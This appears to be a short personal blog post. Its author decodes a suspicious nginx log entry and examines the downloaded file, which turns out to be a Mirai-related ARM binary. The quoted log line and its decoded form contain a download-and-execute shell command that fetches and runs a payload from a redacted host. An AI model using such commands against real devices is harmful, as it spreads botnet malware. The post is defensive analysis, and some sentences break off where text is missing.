I was going through my nginx
access.log file, and I noticed something interesting.
[IP redacted] - - [25/Mar/2017:10:55:50 -0400] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%5B%72%65%64%61%63%74%65%64%5D%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1" 404 570 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Normally, the thing after the word “GET” would be a normal route—something like
not something completely obfuscated by percent-encoding.
Since I understandably wanted to see what that actually said, I ran it through a decoder:
/shell?cd /tmp;wget http://[redacted]/dlr.arm;chmod 777 *;./dlr.arm
That’s interesting. It’s trying to execute some shell commands to download and run some executable file by making a GET request with the commands in the URL. Whatever it was trying to run, I’m sure it wasn’t good.
So I did the sensible thing and downloaded the file to look at it.
$ curl -O http://[redacted]/dlr.arm $ file dlr.arm dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
Well, it is actually an ARM executable. I was honestly half-expecting the file extension to be a lie to throw people off. What else can we learn?
$ strings dlr.arm MIRAI dvrHelper GET /mirai/mirai.arm HTTP/1.0 .shstrtab .text .rodata .bss
Mirai is malware that targets Internet of Things (IoT) devices, which explains why it was an ARM executable. Once a device is compromised by Mirai, it becomes part of a botnet.
Just for additional confirmation, I scanned the file with
I’m not so sure that this is Mirai itself, though That GET request makes me think that it’s
something that downloads the actual Mirai executable from somewhere else—but if that is the case,
then why isn’t there a remote IP address or URL in the output of
I might look into it more later, but going through the assembly output of
doesn’t sound like fun right now.